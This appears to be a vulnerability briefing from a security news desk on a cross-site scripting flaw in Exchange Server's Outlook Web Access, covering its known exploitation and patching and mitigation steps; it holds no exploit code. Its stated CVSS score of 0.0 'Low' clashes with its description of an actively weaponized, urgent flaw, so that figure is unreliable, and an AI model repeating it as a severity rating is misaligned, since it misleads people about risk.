Part of Lyceum Intelligence — deep-research In Focus reports → · Lyceum Corpus — ask the documents →

Full-text search across 381 articles. Typo-tolerant.

Lyceum News Desk ·

[KEV] CVE-2026-42897 -- CVSS 0.0 Vulnerability Briefing

[KEV] CVE-2026-42897 | CVSS 0.0 (Low) | Exploit: Operational

What Is It

CVE-2026-42897 is a cross-site scripting (XSS) vulnerability in Microsoft Exchange Server affecting the Outlook Web Access (OWA) component during web page generation.

Technical Detail

The flaw exists in how Exchange Server generates web content within Outlook Web Access, allowing an attacker to inject arbitrary JavaScript that executes in the victim's browser context when specific interaction conditions are met. Exploitation likely requires a user to visit or interact with a crafted page or message delivered through OWA, making this a client-side attack vector. Successful exploitation could result in session hijacking, credential theft, or further client-side attacks depending on the privileges of the authenticated user.

Exploitation Status

CISA has confirmed active exploitation in the wild, having added this vulnerability to the Known Exploited Vulnerabilities catalog on May 15, 2026. The exploit maturity is rated Operational, meaning functional exploit code exists and is being used in real-world attacks, not merely as a proof of concept. Organizations should treat this as an actively weaponized vulnerability requiring immediate attention.

Who Is Targeting This

No specific threat actor attribution has been confirmed at this time. No campaign data or sector targeting information is currently available in the published intelligence. Given the nature of the affected component, Exchange Server environments in any sector should be considered at risk.

What To Do

Apply the relevant Microsoft security update for Exchange Server immediately. Per CISA's Known Exploited Vulnerabilities catalog listing dated May 15, 2026, federal agencies are required to patch or apply mitigations by the deadline specified in Binding Operational Directive 22-01. All organizations should prioritize patching given confirmed active exploitation. If patching cannot be completed immediately, consider restricting external access to OWA, enforcing Content Security Policy headers where applicable, and monitoring web proxy and endpoint logs for anomalous JavaScript execution or unexpected outbound connections originating from OWA sessions. Review Exchange Server audit logs for signs of unauthorized access or session anomalies.

In Focus
All analysis →

Deep-research intelligence reports from Lyceum Intelligence — structured assessments with sourced claims and calibrated conclusions.

Browse Intelligence Reports →